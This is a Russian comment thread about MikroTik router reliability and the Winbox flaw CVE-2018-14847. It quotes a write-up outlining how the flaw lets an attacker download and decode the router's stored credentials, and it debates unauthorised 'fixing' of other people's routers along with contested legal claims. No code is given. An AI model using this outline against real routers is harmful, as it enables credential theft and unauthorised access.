Comments 116
Вообще, хочу отметить, как показала практика — Mikrotik весьма неоднозначное решение. С одной стороны большой функционал, за вменяемые деньги. С другой, «физические» нагрузки для этого железа недопустимы.
Инженерный дизайн устройств — прост как две палки, как следствие, все вопросы решает софт. Именно поэтому — даже простые реализации в среднем бизнесе довольно быстро выталкивают эту марку «за борт» — нагрузки в направлении шифрования VPN или фильтрации траффика ставят «на колени» многие модели этой марки.
Попытки компенсировать установкой деталей большей мощности и объема — дают передышку, но это напоминает увеличение толщины броневого листа на танке, до тех пор пока не появятся кумулятивные заряды.
К тому же покупая один Mikrotik, всегда — это факт, надо брать второй, на случай отказа оборудования и все время вести актуальный лог конфигураций (архив). Не затрагиваю тему SOHO реализаций, т.к. разброс ± очень большой.
Инженерный дизайн устройств — прост как две палки, как следствие, все вопросы решает софт. Именно поэтому — даже простые реализации в среднем бизнесе довольно быстро выталкивают эту марку «за борт» — нагрузки в направлении шифрования VPN или фильтрации траффика ставят «на колени» многие модели этой марки.
Попытки компенсировать установкой деталей большей мощности и объема — дают передышку, но это напоминает увеличение толщины броневого листа на танке, до тех пор пока не появятся кумулятивные заряды.
К тому же покупая один Mikrotik, всегда — это факт, надо брать второй, на случай отказа оборудования и все время вести актуальный лог конфигураций (архив). Не затрагиваю тему SOHO реализаций, т.к. разброс ± очень большой.
IMHO n0p.me/winbox-bug-dissection — это все, что нужно знать о продукции микротик. Внимательно прочитать, оценить цепочку «случайностей», подумать над What did we Learn? и закрыть для себя вопрос раз и навсегда.
Напишите список производителей, у которых не было критических багов.
Не напишу т.к. я не с планеты админов. Однако, поясню, что же именно вызвало мое бурное удивление в обсуждаемом случае с микротиком.
Это не ошибка в реализации протокола. Да, на кой хрен было воять свой бинарный православный протокол когда есть \<you name\> — а и черт с ними. Наваяли и ладно. Это конечно с самого начала попахивает бомбой замедленного действия но вдруг прокатит (непрокатило).
Меня удивило то, в каком виде маршрутизатор хранит критически важную информацию. А именно — практически в plain text без шифрования.
Это было известно разработчикам. Это было известно широкой публике. Последняя разработчиков об этом предупреждала. Мол рано или поздно вам наступит хана. Они судя по всему на это забили большой болт и продолжают хранить информацию в плейне.
Вот этот момент заставляет мой мозг зависнуть. Так просто не может быть! О неверных правах доступа на /etc/shadow с последующим восстановлением паролей из-за кривого крипта и организации атак я впервые читал как минимум лет 20ть назад. Тогда это было популярно. Но черт возьми, господа, на дворе 2018й год! И что, никогда небыло и вот опять? Это с моей точки зрения за пределами добра и зла. Веры тем, кто сегодня сознательно разрабатывают такие системы, нет ровным счетом никакой. Вне зависимости от остальных ТТХ какими бы хорошими они ни были и сколько бы они не стоили.
Это не ошибка в реализации протокола. Да, на кой хрен было воять свой бинарный православный протокол когда есть \<you name\> — а и черт с ними. Наваяли и ладно. Это конечно с самого начала попахивает бомбой замедленного действия но вдруг прокатит (непрокатило).
Меня удивило то, в каком виде маршрутизатор хранит критически важную информацию. А именно — практически в plain text без шифрования.
Decoding the User Database
Now we can read ANY file from the Router! Which files are useful? In our previous talk on APA3 conference, we talked about just how insecure Mikrotik is, especially when it comes to handling credentials. In short, Mikrotik uses a very weak encoding (no hash and salt) to store passwords to an index file. So it’s entirely possible to download the credential database and extract every username and password stored inside it and that’s exactly what we did for this PoC.
After downloading the idx file, we used another great tool from mikrotik-tools to decrypt the username and password database and dump everything IN PLAIN TEXT !!!
Это было известно разработчикам. Это было известно широкой публике. Последняя разработчиков об этом предупреждала. Мол рано или поздно вам наступит хана. Они судя по всему на это забили большой болт и продолжают хранить информацию в плейне.
Вот этот момент заставляет мой мозг зависнуть. Так просто не может быть! О неверных правах доступа на /etc/shadow с последующим восстановлением паролей из-за кривого крипта и организации атак я впервые читал как минимум лет 20ть назад. Тогда это было популярно. Но черт возьми, господа, на дворе 2018й год! И что, никогда небыло и вот опять? Это с моей точки зрения за пределами добра и зла. Веры тем, кто сегодня сознательно разрабатывают такие системы, нет ровным счетом никакой. Вне зависимости от остальных ТТХ какими бы хорошими они ни были и сколько бы они не стоили.
Вы (и автор приведённой цитаты) смешиваете шифрование и хэширование. В контексте паролей есть всего два принципа: PAP и CHAP. По первому передаётся пароль, а хранится может признак (хэш). По второму передаётся признак пароля (хэш), но хранить нужно непосредственно пароль.
Так вот: слать непонятно куда пароли в явном виде — дурная затея (это не вэб-сайт, который может быть защищён сертификатом от подмены), а раз так остаётся только вариант хранить пароли и передавать признак знания пароля.
Так вот: слать непонятно куда пароли в явном виде — дурная затея (это не вэб-сайт, который может быть защищён сертификатом от подмены), а раз так остаётся только вариант хранить пароли и передавать признак знания пароля.
Вообще по стабильности и функциональной нагруженности аналогов нет. Падать железки у меня не падали. Точнее были проблемы, когда создавались списки адресов из нескольких сотен тысяч записей. Пришлось их оптимизировать масками :)
С VPN вообще никакими проблем не наблюдал. Наверное я не правильно что-то делаю.
Актуальный лог конфигурации вести очень не сложно. У меня есть скрипт, который умеет собрать конфигурацию и отправить как вложение на специальный почтовый ящик (gmail к примеру).
По обновлению софта — проверка стоит по планировщику. Тоже скрипт. В случае нахождения обновления софта собирается текущая конфигурация, собирается релиз нотес с обновления и все вместе высылается на почту. После этого можно идти на железку и обновлять ее, точно понимая что конфигурацию ни при каких проблемах не потеряешь.
С VPN вообще никакими проблем не наблюдал. Наверное я не правильно что-то делаю.
Актуальный лог конфигурации вести очень не сложно. У меня есть скрипт, который умеет собрать конфигурацию и отправить как вложение на специальный почтовый ящик (gmail к примеру).
По обновлению софта — проверка стоит по планировщику. Тоже скрипт. В случае нахождения обновления софта собирается текущая конфигурация, собирается релиз нотес с обновления и все вместе высылается на почту. После этого можно идти на железку и обновлять ее, точно понимая что конфигурацию ни при каких проблемах не потеряешь.
Я как чувствовал, появление такого комментария вопрос времени :)
К сожалению, из Вашего комментария, не могу понять, что из этого списка — mikrotik.com/products установлено, на какое количество соединений в единицу времени, какие типы протоколов и количество/характеристики правил на firewall-e. Нюансов — черт ногу сломит. Потому как если «коробка» за 400 евро спокойно держит 5 человек — такое утверждение имеет место быть.
В целом, считаю, спорить смысла нет. Просто ставим железо, настраиваем и наблюдаем за результатом.
Также стоит отметить сложность логики в настройке устройства, особенно для тех, кто не часто сталкивается с ними.
К сожалению, из Вашего комментария, не могу понять, что из этого списка — mikrotik.com/products установлено, на какое количество соединений в единицу времени, какие типы протоколов и количество/характеристики правил на firewall-e. Нюансов — черт ногу сломит. Потому как если «коробка» за 400 евро спокойно держит 5 человек — такое утверждение имеет место быть.
В целом, считаю, спорить смысла нет. Просто ставим железо, настраиваем и наблюдаем за результатом.
Также стоит отметить сложность логики в настройке устройства, особенно для тех, кто не часто сталкивается с ними.
Давайте пример: Маршрутизатор Mikrotik RB3011UiAS
Канала в интернет ~150Мбит
Пользователей(dhcp): ~ 100 человек + мобильные устройства через точки wifi ~ 50 штук
Правил в фаерволе: 40-50
Тунели(PPTP\l2TP): 3-и постоянных, + около 20 человек могут поднимать для работы из дома.
В среднем нагрузка на CPU в течении рабочего дня 10%
Канала в интернет ~150Мбит
Пользователей(dhcp): ~ 100 человек + мобильные устройства через точки wifi ~ 50 штук
Правил в фаерволе: 40-50
Тунели(PPTP\l2TP): 3-и постоянных, + около 20 человек могут поднимать для работы из дома.
В среднем нагрузка на CPU в течении рабочего дня 10%
А где пример? Это описание того, что есть, а что из всего этого работает в реальном времени. Я же написал, цитирую: «какое количество соединений в единицу времени, какие типы протоколов и количество/характеристики правил на firewall-e».
Если сидеть читать почту и просматривать web контент, то 10% слишком много :)
Ладно. Берем это — www.markit.eu/ee/ru/mikrotik-cloud-core-router-ccr1036-8g-2s-router/v2p8038080c150102 или www.markit.eu/ee/ru/watchguard-firebox-m200-high-availability-security-appliance-8/v2p10600071c150802
Причем последний гарантировано тянет 1500 человек (единовременно), канал подключения 300 Мбит/с (выделен только под него, общий канал 1 гбит/с), параллельно в день от 100 до 250 VPN IPSec соединений (удаленные станции и лаптопы пользователей). Вот сколько еще проходит гостевых соединений — не скажу, понятия не имею, вообще это все отдельно висит в невысоком приритете, затычек точно не было :)
На канал в 1 гбит стоит Extreme Networks решение, двойное (единовременно от 3500 до 6000 конечных устройств, количесто соединений — не скажу, врать не буду). Работают в паре, на случай сбоя одного из них. Честно, при таком расладе, ставить Mikrotik — даже в голову не пришло как-то :)
Все свичи либо Extreme, либо Netgear Ent. — пример только одного учереждения, конечно где-то больше, где-то меньше. Но суть статьи — взлом это плохо! Я хочу сказать, это будет в сотни раз хуже, если это решение отвечает еще и за корпоративную инфраструктуру.
В качестве дополнения, обратите внимание, никогда Mikrotik не будет ручаться за производительность устройства с настроеным firewall-ом (UTM, IPS, антивирус — если они конечно у вас есть :) ), все время сноски с пояснением «зависит от конфигурации». Откройте любое руководство Watchguard или Extreme Network, да даже Netgear (тут, справедливости ради, не всегда) — но прописана гарантия скорости, сколько не ковыряй настройки (откровенный хардкор не в счет).
Канализация большая не потому что сейчас много народу сидит на унитазах, а потому, что когда все сядут… то тут получается ситуация несколько иная, потому как пример имеет место быть только в SOHO и small-business.
Нормальный middle и high — всегда работат в пике возможностей.
Всем хорошего дня!
Если сидеть читать почту и просматривать web контент, то 10% слишком много :)
Ладно. Берем это — www.markit.eu/ee/ru/mikrotik-cloud-core-router-ccr1036-8g-2s-router/v2p8038080c150102 или www.markit.eu/ee/ru/watchguard-firebox-m200-high-availability-security-appliance-8/v2p10600071c150802
Причем последний гарантировано тянет 1500 человек (единовременно), канал подключения 300 Мбит/с (выделен только под него, общий канал 1 гбит/с), параллельно в день от 100 до 250 VPN IPSec соединений (удаленные станции и лаптопы пользователей). Вот сколько еще проходит гостевых соединений — не скажу, понятия не имею, вообще это все отдельно висит в невысоком приритете, затычек точно не было :)
На канал в 1 гбит стоит Extreme Networks решение, двойное (единовременно от 3500 до 6000 конечных устройств, количесто соединений — не скажу, врать не буду). Работают в паре, на случай сбоя одного из них. Честно, при таком расладе, ставить Mikrotik — даже в голову не пришло как-то :)
Все свичи либо Extreme, либо Netgear Ent. — пример только одного учереждения, конечно где-то больше, где-то меньше. Но суть статьи — взлом это плохо! Я хочу сказать, это будет в сотни раз хуже, если это решение отвечает еще и за корпоративную инфраструктуру.
В качестве дополнения, обратите внимание, никогда Mikrotik не будет ручаться за производительность устройства с настроеным firewall-ом (UTM, IPS, антивирус — если они конечно у вас есть :) ), все время сноски с пояснением «зависит от конфигурации». Откройте любое руководство Watchguard или Extreme Network, да даже Netgear (тут, справедливости ради, не всегда) — но прописана гарантия скорости, сколько не ковыряй настройки (откровенный хардкор не в счет).
Канализация большая не потому что сейчас много народу сидит на унитазах, а потому, что когда все сядут… то тут получается ситуация несколько иная, потому как пример имеет место быть только в SOHO и small-business.
Нормальный middle и high — всегда работат в пике возможностей.
Всем хорошего дня!
Жаль, я пока минусить не могу, тоже бы минуснул… ваши примеры стоят ровно в 3 раза дороже 3011.
В ваш ценник отлично вписывается CCR1009, у меня он стоит в продакшене в Дата-Центре, обслуживает около 100 клиентов.
На текущий момент 30 000 соединений, 15 IPSec туннелей, 250 правил firewall и 200 правил NAT, не считая Mangle и 3х BGP-сессий, загрузка процессора 25%, загрузка оперативной памяти 28%.
По поводу пропускной способности — не заставляйте меня, вместо вас, лезть в гугл за статьёй, где человек поставил клиенту циску, а у клиента уже были микроты и когда подняли туннели, упёрлись в производительность циски, т.к. не был куплен модуль аппаратного шифрования за 20килорублей, а микроты там стояли 1100, по цене 18к рублей и с распаянными чипами аппаратного шифрования.
В ваш ценник отлично вписывается CCR1009, у меня он стоит в продакшене в Дата-Центре, обслуживает около 100 клиентов.
На текущий момент 30 000 соединений, 15 IPSec туннелей, 250 правил firewall и 200 правил NAT, не считая Mangle и 3х BGP-сессий, загрузка процессора 25%, загрузка оперативной памяти 28%.
По поводу пропускной способности — не заставляйте меня, вместо вас, лезть в гугл за статьёй, где человек поставил клиенту циску, а у клиента уже были микроты и когда подняли туннели, упёрлись в производительность циски, т.к. не был куплен модуль аппаратного шифрования за 20килорублей, а микроты там стояли 1100, по цене 18к рублей и с распаянными чипами аппаратного шифрования.
Ну не упустите возможность, когда появится. И можете особо не утруждать себя поисками в интернете подобных вещей или устраивать на эту тему holy-war полемику.
Особенно, когда в вашем комментарии, я ни слова не заметил про услугу поддержки железа, которая является категорически важным элементом. Я еще не помню, предприятие, представляющее Mikrotik, которое имело бы, при покупке устройства, SLA по поддержке и обслуживанию.
Составляя проект, в разрезе 3-4 календарных лет, учитываются подобные нюансы, но я вижу, что подобным Вы не занимались. При таком раскладе не преследуется интерес выиграть ничтожное количество денег, в единовременной оплате первичного договора/покупки. А далее что? Надеется, что вам достался именно тот вариант, который без сбоев и брака протянет 10 лет в стойке? Лотерейка?
Я считаю, что Микротик не может быть, по определению, частью цепочки важной инфраструктуры. Я знаю, что все вопросы данное решение делает только за счет ПО и имеет минимальную оптимизацию под то железо, на котором построено. Это факт, почитайте.
Также, я вижу, что недовольны только те, кто не имеет возможности поставить не «бюджетное» решение — но я тут причем? Если вы вынуждены ставить Микротик, а я тут такие вещи говорю — конечно, «минусить» можно, а смысл? Что это даст? Я же не призываю выкинуть его, весь комментарий — метода довести до людей, что при отвественном отношении, экономия при выборе непрофессионального инструмента, в серьезном делопроизводстве, может повлечь расходы — время/деньги.
Если — это не так важно, тогда вообще не понятно — о чем спор?
В конце-концов, я тоже на своей машине с прицепом могу привезти на участок нужное количество земли. НО! Если это сделать на самосвале, то моя экономия денег/времени, что я трачу на загрузку/выгрузку своего прицепа, количества топлива, что потрачено на поездки туда/обратно, на возможный ремонт прицепа/машины после такого пробега — будет оптимальной. Несмотря на то, что за услугу придется платить чуть больше, но — это с экскаватором, фильтрацией земли от камней и здоровой спиной :)
Хорошего дня!
Особенно, когда в вашем комментарии, я ни слова не заметил про услугу поддержки железа, которая является категорически важным элементом. Я еще не помню, предприятие, представляющее Mikrotik, которое имело бы, при покупке устройства, SLA по поддержке и обслуживанию.
Составляя проект, в разрезе 3-4 календарных лет, учитываются подобные нюансы, но я вижу, что подобным Вы не занимались. При таком раскладе не преследуется интерес выиграть ничтожное количество денег, в единовременной оплате первичного договора/покупки. А далее что? Надеется, что вам достался именно тот вариант, который без сбоев и брака протянет 10 лет в стойке? Лотерейка?
Я считаю, что Микротик не может быть, по определению, частью цепочки важной инфраструктуры. Я знаю, что все вопросы данное решение делает только за счет ПО и имеет минимальную оптимизацию под то железо, на котором построено. Это факт, почитайте.
Также, я вижу, что недовольны только те, кто не имеет возможности поставить не «бюджетное» решение — но я тут причем? Если вы вынуждены ставить Микротик, а я тут такие вещи говорю — конечно, «минусить» можно, а смысл? Что это даст? Я же не призываю выкинуть его, весь комментарий — метода довести до людей, что при отвественном отношении, экономия при выборе непрофессионального инструмента, в серьезном делопроизводстве, может повлечь расходы — время/деньги.
Если — это не так важно, тогда вообще не понятно — о чем спор?
В конце-концов, я тоже на своей машине с прицепом могу привезти на участок нужное количество земли. НО! Если это сделать на самосвале, то моя экономия денег/времени, что я трачу на загрузку/выгрузку своего прицепа, количества топлива, что потрачено на поездки туда/обратно, на возможный ремонт прицепа/машины после такого пробега — будет оптимальной. Несмотря на то, что за услугу придется платить чуть больше, но — это с экскаватором, фильтрацией земли от камней и здоровой спиной :)
Хорошего дня!
В любом таком обсуждении куча нюансов.
Если говорить про настройку — она сопоставима с CISCO, как, в принципе, и функционал.
По крайней мере потребности сегмента SOHO покрываются с хорошим запасом.
Понятно что рядом с серьезными Blade системами решения микротика будут смотреться не очень уместно, тем не менее возможности железок более чем достойные.
Если говорить про настройку — она сопоставима с CISCO, как, в принципе, и функционал.
По крайней мере потребности сегмента SOHO покрываются с хорошим запасом.
Понятно что рядом с серьезными Blade системами решения микротика будут смотреться не очень уместно, тем не менее возможности железок более чем достойные.
Скажем так, Mikrotik — компромисс. VPN у него в части реализации не допилен, и если не надо шлюзовать человека через себя, то встаёт вопрос о dns-masq, которого нет. В результате при подключении не дают пуши роутингов клиенту и он не знает внутренних адресов. Насколько знаю, это не решено по сей день. У себя решили административно, т.е. есть файл для рукастых, который кормится в этот момент.
Точно не помню, но и с FreeRadius есть кое-какие затыки (вроде с группами, врать не буду).
Есть ещё вопросы и по бэкапу. Нет, он делается, но ловил себя на том, что не каждый восстанавливается в случае сложной конфигурации. Причём он делался корректно.
Точно не помню, но и с FreeRadius есть кое-какие затыки (вроде с группами, врать не буду).
Есть ещё вопросы и по бэкапу. Нет, он делается, но ловил себя на том, что не каждый восстанавливается в случае сложной конфигурации. Причём он делался корректно.
Склонен с вами не согласиться. Просто не надо ожидать от этих устройств всего сразу и бесплатно. Да, они очень хороши за свои деньги и аналогов за эти деньги нет. Да, есть железки быстрее и дороже, и, опять же, у Микротика они тоже есть.
Нужна определённая функция? Она есть. Нужна высокая скорость? Нужно, чтобы была аппаратная поддержка в конкретной модели. То же самое с Vlan, фильтрацией и т.п.
То, что каждое устройство может всё, не значит, что все функции стоит настраивать на одном устройстве (в чём, собственно и главная прелесть сети — её отлично можно масштабировать горизонтально). Ну или смириться, что скорость будет далеко не максимально-возможной. И опять же, учиться, учиться и ещё раз учиться — входной порог невысокий, нюансы есть, разной степени важности, и многие дают большой прирост именно по скорости. И при правильной настройке и знании особенностей железа вполне получается выжимать WireSpeed на весьма недорогом оборудовании.
Ну и услышал бы предложенную альтернативу, раз уж… По свичам, например, когда я искал 24 порта с изоляцией — либо UBNT, либо в разы дороже, либо неизвестной стабильности типа level1
Нужна определённая функция? Она есть. Нужна высокая скорость? Нужно, чтобы была аппаратная поддержка в конкретной модели. То же самое с Vlan, фильтрацией и т.п.
То, что каждое устройство может всё, не значит, что все функции стоит настраивать на одном устройстве (в чём, собственно и главная прелесть сети — её отлично можно масштабировать горизонтально). Ну или смириться, что скорость будет далеко не максимально-возможной. И опять же, учиться, учиться и ещё раз учиться — входной порог невысокий, нюансы есть, разной степени важности, и многие дают большой прирост именно по скорости. И при правильной настройке и знании особенностей железа вполне получается выжимать WireSpeed на весьма недорогом оборудовании.
Ну и услышал бы предложенную альтернативу, раз уж… По свичам, например, когда я искал 24 порта с изоляцией — либо UBNT, либо в разы дороже, либо неизвестной стабильности типа level1
Вот тут согласен, но у нигде не писал, что ожидал от этого решения «всего и сразу». к счастью много опыта, максимум, чт оя могу от Mikrotik ожидать — это сносной работы точек беспроводного доступа в небольшой конторе.
«Да, есть железки быстрее и дороже, и, опять же, у Микротика они тоже есть» — вот это и есть отсыл к наращиванию брони.
«о, что каждое устройство может всё, не значит, что все функции стоит настраивать на одном устройстве» — согласен, но когда вы последний раз видели, чтобы покупая в организацию Mikrotik, человек что-то упорно маштабировал? Да почти никогда, в 90% покупают «кухонный комбайн», потому что может :)
«вполне получается выжимать WireSpeed на весьма недорогом оборудовании» — это при относительной небольшой нагрузке со стороны firewall-a (это как один из вариантов).
Насчет альтернатив:
Ничего экстраординарного. Просто, ожидаю комментария по поводу стоимости, но тогда мы вренемся к пункту «все сразу и за дешево» :)
«Да, есть железки быстрее и дороже, и, опять же, у Микротика они тоже есть» — вот это и есть отсыл к наращиванию брони.
«о, что каждое устройство может всё, не значит, что все функции стоит настраивать на одном устройстве» — согласен, но когда вы последний раз видели, чтобы покупая в организацию Mikrotik, человек что-то упорно маштабировал? Да почти никогда, в 90% покупают «кухонный комбайн», потому что может :)
«вполне получается выжимать WireSpeed на весьма недорогом оборудовании» — это при относительной небольшой нагрузке со стороны firewall-a (это как один из вариантов).
Насчет альтернатив:
- Aruba/HP, Ruckus (при планировании беспроводных решений)
- Extreme Networks, HP, Cisco, Netgear (свичи, роутинг)
- Fortinet, Watchguard, Cisco (защита)
Ничего экстраординарного. Просто, ожидаю комментария по поводу стоимости, но тогда мы вренемся к пункту «все сразу и за дешево» :)
В общем, могу сказать, что по свичам их 326я линейка весьма неплоха, с одной стороны, но с другой — надо учиться готовить, кто б сомневался. Но правила на портах есть и работают со скоростью порта. Собственно, альтернатива наращиванию брони.
Ну и минус — железо по большей части у микротика ничерта аппаратно не делает, тот же 750gr3 — натить умеет быстро, гигабит с загрузкой около 40% делает, но не умеет аппаратно vlan и bonding, из-за чего приходится изголяться. В общем и целом — с внешним миром общаться скоростей хватает, а внутри — приходится изголяться, если больше гигбита хочется.
Ещё могу сказать, что микротик 2 года назад, сейчас и 5 лет назад — это совершенно разного уровня продукты. 5 лет назад они были на уровне линксиса с зюкселем, а сейчас их не стыдно со списком выше сравнить (ну да, хуже, кто ж спорит). Да и броня у них такая же, просто она не афишируется)
Ну и как-то очень уж оно Linux-Way…
Ну и минус — железо по большей части у микротика ничерта аппаратно не делает, тот же 750gr3 — натить умеет быстро, гигабит с загрузкой около 40% делает, но не умеет аппаратно vlan и bonding, из-за чего приходится изголяться. В общем и целом — с внешним миром общаться скоростей хватает, а внутри — приходится изголяться, если больше гигбита хочется.
Ещё могу сказать, что микротик 2 года назад, сейчас и 5 лет назад — это совершенно разного уровня продукты. 5 лет назад они были на уровне линксиса с зюкселем, а сейчас их не стыдно со списком выше сравнить (ну да, хуже, кто ж спорит). Да и броня у них такая же, просто она не афишируется)
Ну и как-то очень уж оно Linux-Way…
А что не так с ubnt?
И всё-таки дырявость «из коробки», пусть даже за «не дорого» это очень плохо. Сразу складывается стереотип — микротик это боль и плохо. Даже если потом компания решит поменять стратегию и начнет клепать девайсы таки с заштопанными дырами. Снять клеймо «плохого вендора» будет охх как не легко.
«Из коробки» известных дырявостей нет, т.к. на WAN порту стоит файервол.
«Из коробки» input drop есть только на ether1, а не вообще на WAN.
Любой другой логический интерфейс, поднятый через ether1, «из коробки» уже открыт всему миру.
Любой другой логический интерфейс, поднятый через ether1, «из коробки» уже открыт всему миру.
«Из коробки» на первом порту в простых моделях прямо написано: Internet.
Картинка
Что не даст рядовому пользователю промахнуться на этапе подключения. Если это бизнес — железка обычно настраивается до ввода в эксплуатацию на критический объект, а не после.Если на нем висит логический интерфейс, т.е. pptp, pppoe и пр., то по-умолчанию он будет открыт для всех.
Могу ошибаться по поводу поведения Quick Setup в различных версиях ROS, но во многих случаях правила в nat POSTROUTING и filter INPUT надо было добавлять руками.
Так что, даже если Mikrotik настраивается для применения в качестве домашнего роутера, изменения, внесенные Quick Setup-ом, надо перепроверять, а лучше все правила создавать руками.
Могу ошибаться по поводу поведения Quick Setup в различных версиях ROS, но во многих случаях правила в nat POSTROUTING и filter INPUT надо было добавлять руками.
Так что, даже если Mikrotik настраивается для применения в качестве домашнего роутера, изменения, внесенные Quick Setup-ом, надо перепроверять, а лучше все правила создавать руками.
Никакой другой логический интерфейс «из коробки» не настроен, а, следовательно, абсолютно безопасен, т.к. не существует.
Много чего было и есть дырявого «из коробки», вы никогда об этом не узнаете, пока не сломают. Хуавей некоторые свои железки даже латать не собирается (ибо старые). С Микротиком другая особенность — «из коробки» он требует предварительной настройки даже в случае с типа домашним роутером hAP ac2.
Вот прям сразу надо идти на wiki.mikrotik.com/wiki/Manual:Securing_Your_Router
и вдумчиво делать то, что там написано. Другое дело, что им может быть лучше продавать свои роутеры с отключенным и закрытым всем (включая даже доступ для winbox), кроме вебморды c внутренней сети.
Вот прям сразу надо идти на wiki.mikrotik.com/wiki/Manual:Securing_Your_Router
и вдумчиво делать то, что там написано. Другое дело, что им может быть лучше продавать свои роутеры с отключенным и закрытым всем (включая даже доступ для winbox), кроме вебморды c внутренней сети.
99,9% не будут читать wiki, в том числе и я — кроме желания, на это нужно время — много времени. Чтобы понять всё что там написано, опять же нужно перечитать кучу доков. Сейчас всем нужно — распаковал, настроил и забыл. Внутреннюю сеть, кстати тоже бы закрыть не мешало. «Из коробки» оставить только входящие из LAN https/ssh. Исходящие — рубить все, надо будет — настроят, в том числе NAT, визардом в пару кликов. Плюс такого подхода — запрещено всё что не разрешено. К сожалению далеко не все вендоры так делают. Та же самая Cisco — не следует такому принципу, хотя в PIX-ах или ASA-x замечал последнее правило, рубящее все.
> Я в свободное от работы и отдыха время искал уязвимые устройства по всей сети и делал настройки в соответствии со своими рекомендациями, то есть добавлял правила фаервола, которые закрывали доступ к роутеру не из локальной сети.
Чтобы «сделать настройки в соответствии со своими рекомендациями» необходимо получить удаленный контроль над устройством. Просто так, даже не смотря на то что это добрый микротик, устройство вам его не даст.
Правильно ли я вас понимаю, что вы фактически взламываете устройство используя например феерический CVE-2018-14847 и удаленно изменяете его настройки? Естественно без ведома хозяина устройства.
Если догадка верна у меня только один вопрос: вы не боитесь, что рано или поздно вас могут неправильно понять? С потенциально самыми разными последствиями. Не факт что приятными.
Чтобы «сделать настройки в соответствии со своими рекомендациями» необходимо получить удаленный контроль над устройством. Просто так, даже не смотря на то что это добрый микротик, устройство вам его не даст.
Правильно ли я вас понимаю, что вы фактически взламываете устройство используя например феерический CVE-2018-14847 и удаленно изменяете его настройки? Естественно без ведома хозяина устройства.
Если догадка верна у меня только один вопрос: вы не боитесь, что рано или поздно вас могут неправильно понять? С потенциально самыми разными последствиями. Не факт что приятными.
Вот да, мне тоже интересно, о чём думает автор когда мало того, что занимается этим, так ещё и отписывается об этом в статье. Я лично считаю что таким активистам ещё и приплачивать надо, но формально по закону, скорее всего, их можно сажать. И наверняка найдётся какой-нибудь местечковый прокурор, который увидит в этой статье лёгкий способ получить лишнюю "палку" заведя дело на автора.
Не совсем так. Должен быть ущерб — материальный или моральный. Ну или, как минимум, конкретная статья, предусматривающая наказание. А без этого дела не завести.
Вмешательство в работу сетей, вроде во всех цивилизованньіх законодательствах такая статья есть.
А вот подняли мэйлсервер с открытым релэем. Человек тут же попадает в блэклисты и не может работать. Это как, вмешательство в работу сетей или что? Человек же работать не может. Письма не посылаются, он терпит убытки из-за невозможности пересылать деловую корреспонденцию и т.п. С его точки зрения ему сознательно палки в колеса пихают. Разве нет? Тема очень очень скользкая. Сообщество профессионалов зачастую принимает разумные решения, которые большинство считает ущемлением или ограничением их прав. Всегда тяжело давать однозначную оценку подобным деяниям.
вмешательство в работу сетей или что? Человек же работать не может
Вы прям все точно про РКН написали :). Но разве кто то что то доказал ?)
Тут надо разделять.
Если пользователь попадает в блеклисты на чужом устройстве (не владелец) из-за внешних факторов (политика внешней компании, например).
И если доброжелатель взламывает внутренний роутер, принадлежащий конечному пользователю (владелец).
То есть реального скольжения на данном этапе нет. Автор поста несанкционированно, путём взлома попадает на конечное устройство, которым владеет пользователь и производит на нём махинации.
Если пользователь попадает в блеклисты на чужом устройстве (не владелец) из-за внешних факторов (политика внешней компании, например).
И если доброжелатель взламывает внутренний роутер, принадлежащий конечному пользователю (владелец).
То есть реального скольжения на данном этапе нет. Автор поста несанкционированно, путём взлома попадает на конечное устройство, которым владеет пользователь и производит на нём махинации.
О. Какое отличное пояснение. Да я согласен, тут надо думать как интерпретировать события. Но все равно, разница существенная. В одном случае вмешательства как бы нет, но есть реальное противодействие. Во втором случае вроде есть вмешательство, но нет реальной помехи текущей работе. Как бы так описать то… Ну, в одном случае владельцу незапертого авто заблокировали выезд со двора положив поперек пути, ну я не знаю, бетонную чушку, в другом случае положили на сиденье записку, что мол двери стоит закрывать. Опять же да, примеры из реального мира не вполне описывают положение вещей, но на мой взгляд суть, всё таки, в возможном вреде от махинаций.
С этим как раз все просто:
Статья 272 УК РФ. Неправомерный доступ к компьютерной информации
1. Неправомерный доступ к охраняемой законом компьютерной информации, если это деяние повлекло уничтожение, блокирование, модификацию либо копирование компьютерной информации, —
наказывается штрафом в размере до двухсот тысяч рублей или в размере заработной платы или иного дохода осужденного за период до восемнадцати месяцев, либо исправительными работами на срок до одного года, либо ограничением свободы на срок до двух лет, либо принудительными работами на срок до двух лет, либо лишением свободы на тот же срок.
2. То же деяние, причинившее крупный ущерб или совершенное из корыстной заинтересованности, —
наказывается штрафом в размере от ста тысяч до трехсот тысяч рублей или в размере заработной платы или иного дохода осужденного за период от одного года до двух лет, либо исправительными работами на срок от одного года до двух лет, либо ограничением свободы на срок до четырех лет, либо принудительными работами на срок до четырех лет, либо арестом на срок до шести месяцев, либо лишением свободы на тот же срок.
Т.к. оставлен кошелек с просьбой перевода денег и есть факт получения прибыли, то судья вполне может квалифицировать как «корыстную заинтересованность».
P.S. Я сам за то чтобы бороться с уязвимостями, но вот выбранный путь вызывает вопросы.
Статья 272 УК РФ. Неправомерный доступ к компьютерной информации
1. Неправомерный доступ к охраняемой законом компьютерной информации, если это деяние повлекло уничтожение, блокирование, модификацию либо копирование компьютерной информации, —
наказывается штрафом в размере до двухсот тысяч рублей или в размере заработной платы или иного дохода осужденного за период до восемнадцати месяцев, либо исправительными работами на срок до одного года, либо ограничением свободы на срок до двух лет, либо принудительными работами на срок до двух лет, либо лишением свободы на тот же срок.
2. То же деяние, причинившее крупный ущерб или совершенное из корыстной заинтересованности, —
наказывается штрафом в размере от ста тысяч до трехсот тысяч рублей или в размере заработной платы или иного дохода осужденного за период от одного года до двух лет, либо исправительными работами на срок от одного года до двух лет, либо ограничением свободы на срок до четырех лет, либо принудительными работами на срок до четырех лет, либо арестом на срок до шести месяцев, либо лишением свободы на тот же срок.
Т.к. оставлен кошелек с просьбой перевода денег и есть факт получения прибыли, то судья вполне может квалифицировать как «корыстную заинтересованность».
P.S. Я сам за то чтобы бороться с уязвимостями, но вот выбранный путь вызывает вопросы.
Вот именно.
Таким образом, даже установка майнера не попадает под статью 272 УК РФ.
К слову, ПО не попадает под определение компьютерной информации, так что обновление прошивки тоже не вменить.
уничтожение, блокирование, модификацию либо копирование компьютерной информации
Таким образом, даже установка майнера не попадает под статью 272 УК РФ.
К слову, ПО не попадает под определение компьютерной информации, так что обновление прошивки тоже не вменить.
Это закон, тут не все так просто. Вот еще выдержки из 272 УК РФ
